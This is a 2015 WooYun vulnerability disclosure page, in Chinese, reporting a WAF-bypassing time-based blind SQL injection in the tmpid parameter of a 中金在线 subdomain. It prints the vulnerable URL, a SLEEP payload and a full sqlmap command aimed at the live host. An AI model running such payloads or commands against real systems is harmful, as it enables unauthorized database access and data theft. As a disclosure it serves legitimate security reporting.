当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143778

漏洞标题:中金在线某站SQL绕过WAF注入

相关厂商:福建中金在线网络股份有限公司

漏洞作者: 路人甲

提交时间:2015-09-28 15:36

修复时间:2015-10-03 15:38

公开时间:2015-10-03 15:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-28: 细节已通知厂商并且等待厂商处理中
2015-10-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

找到一个注入点还真不容易,测试很多没发现,看看厂家信息,发现8月份被提交了很多,难道8月份被众测,没有了么?不信,艰难找到
一个!~~~但是似乎信息虽然大,能不能利用就不知道了,没有dump多少信息测试。

详细说明:

抓包得到一个地址

http://alog.cnfol.com/browserinfo.php?
tmpid=62925465&callback=jQuery16108001530755652247_1443348356354&_=1443348417036


tmpid存在注入,加上',测试发现被过滤成\\'

0.jpg


自己不会脚本,不会构建注入,那就还是上sqlmap吧。
测试发现能够检测有疑似注入点,但是没有得到结果,那么就加大level和risk测试,最终还是绕过去了!~~~

Payload: tmpid=62925465 AND SLEEP(5)&callback=jQuery16108001530755652247_1443348356354&_=1443348417036
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])


sqlmap.py -u "http://alog.cnfol.com/browserinfo.php?
tmpid=62925465&callback=jQuery16108001530755652247_1443348356354&_=1443348417036" --threads 10 --dbms "MySQL"
--level 5 --risk 3 -p tmpid --technique BT --current-user --current-db --is-dba


1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


似乎是浏览者的信息,但是数据大,测试了一两条,为空的较多,后面估计有信息,但是不想测试了,猜测可能有利用的信息,比如ID和
mobile之类吧,不继续了,提交吧!~~~太慢了主要,这么大数据会出错!~~~

漏洞证明:

如上

修复方案:

继续过滤吧!~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-03 15:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无